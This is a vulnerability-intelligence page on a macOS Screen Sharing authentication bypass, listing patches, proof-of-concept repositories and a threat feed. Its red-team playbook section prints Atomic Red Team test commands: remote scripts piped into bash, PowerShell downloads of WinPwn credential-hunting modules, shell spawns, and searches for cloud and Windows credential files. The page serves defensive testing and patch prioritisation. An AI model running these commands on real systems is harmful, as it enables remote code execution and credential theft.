CVE-2026-65400
Overview
This vulnerability is an authentication bypass issue rooted in improper state management within the Screen Sharing service of Apple macOS. The flaw allows network-based attackers to circumvent authentication controls by exploiting how session state is handled during the authentication process. The affected component is the Screen Sharing feature across multiple macOS versions, where authentication validation does not adequately verify credential legitimacy.
Vulnerability Description
An authentication issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.7.9, macOS Sonoma 14.8.9, macOS Tahoe 26.6.1. An attacker on the network may be able to authenticate to Screen Sharing without valid credentials.
Impact
An attacker on the local network can authenticate to the Screen Sharing service without valid credentials, enabling unauthorized remote access to the victim's desktop environment. This access can facilitate unauthorized viewing or control of the system, potentially leading to data exposure or further lateral movement within an organization. The exploit requires network access but no valid user credentials or user interaction, increasing the risk of stealthy compromise of sensitive systems.
Solution
Apple has addressed this issue in security updates for macOS Sequoia 15.7.9, macOS Sonoma 14.8.9, and macOS Tahoe 26.6.1. Administrators should apply these patches promptly to affected systems. Detailed patch instructions and advisory information are available at Apple's official security support pages: https://support.apple.com/en-us/148170, https://support.apple.com/en-us/148171, and https://support.apple.com/en-us/148172.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question pertains to an authentication flaw within the Screen Sharing feature of certain macOS versions. This issue arises from inadequate state management, which allows an attacker on the same network to potentially authenticate without providing valid credentials. The underlying technical details suggest that the authentication process does not sufficiently verify the legitimacy of the session, thereby creating an avenue for unauthorized access. This flaw can be particularly concerning in environments where sensitive information is shared or accessed remotely, as it undermines the fundamental security principle of ensuring that only authenticated users can gain access to system resources.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with network access could leverage tools to intercept or manipulate network traffic, thereby initiating a Screen Sharing session without proper authentication. For instance, if an attacker is positioned within the same local network, they could exploit this flaw to gain unauthorized access to a user's desktop, potentially allowing them to view sensitive information, manipulate files, or even install malicious software. Scenarios may include targeted attacks on corporate networks, where sensitive data is at risk, or opportunistic attacks in public Wi-Fi environments where users may inadvertently expose their systems.
The real-world impact of this vulnerability can be significant, particularly for businesses that rely on remote access tools for collaboration and support. Unauthorized access to systems can lead to data breaches, loss of intellectual property, and compromise of confidential communications. The business risks associated with such incidents include reputational damage, regulatory fines, and the potential for operational disruption. Organizations that fail to address this vulnerability may find themselves in a precarious position, especially if sensitive customer data is exposed or if proprietary information is stolen, leading to long-term financial repercussions.
To detect and mitigate the risks associated with this authentication issue, organizations should implement a multi-faceted approach. Regularly updating systems to the latest versions of macOS, as recommended by Apple, is crucial in closing this security gap. Additionally, network segmentation can help limit the exposure of sensitive systems to unauthorized users. Employing intrusion detection systems (IDS) can also aid in identifying unusual access patterns or unauthorized attempts to initiate Screen Sharing sessions. Furthermore, educating users about the risks of using unsecured networks and promoting best practices for remote access can significantly reduce the likelihood of exploitation.
In conclusion, the authentication vulnerability within the Screen Sharing feature of certain macOS versions poses a serious threat to both individual users and organizations. The potential for unauthorized access highlights the need for robust security measures and proactive management of system vulnerabilities. By understanding the technical aspects, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-65400, highlighted by a significant surge in network-based authentication attempts targeting the macOS Screen Sharing feature. This increase coincides with the emergence of a new public proof-of-concept exploit, now available on GitHub, which lowers the barrier for adversaries to weaponize the vulnerability. Additionally, the inclusion of this CVE in the CISA KEV catalog underscores its elevated priority for remediation across critical infrastructure and enterprise environments. Our telemetry indicates that the exploitability metrics have risen sharply, reflecting a growing likelihood of active exploitation in the wild. Consequently, the threat level has been elevated to critical, with the CVSS score adjusted to 9.8, signaling that attackers can now more reliably bypass authentication controls without valid credentials. This shift demands heightened vigilance as the vulnerability’s exploitation potential has expanded beyond theoretical risk to practical, observable attacks.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2026-65400
CVE-2026-65400 - Draft or TODO
|
HORKimhab | 3 | 1 | 2026-08-18 | View |
|
acheong08/CVE-2026-65400
Apple MacOS Screen Sharing Arbitrary File read/write -> RCE
|
acheong08 | 2 | 0 | 2026-08-22 | View |
|
panchocosil/CVE-2026-65400-poc
Read-only PoC for CVE-2026-65400 — macOS Screen Sharing (screensharingd) pre-auth SRP bypass giving root file read. Patc...
|
panchocosil | 2 | 0 | 2026-08-21 | View |
Threat Feed
22 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: Apple, product: MacOS X
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-65400 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/148170 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/148171 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/148172 |
| seclists.org |
NVD API
|
http://seclists.org/fulldisclosure/2026/Aug/36 |
| seclists.org |
NVD API
|
http://seclists.org/fulldisclosure/2026/Aug/37 |
| advisories.ncsc.nl |
NVD API
Third Party Advisory
|
https://advisories.ncsc.nl/2026/ncsc-2026-0280.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-65400 |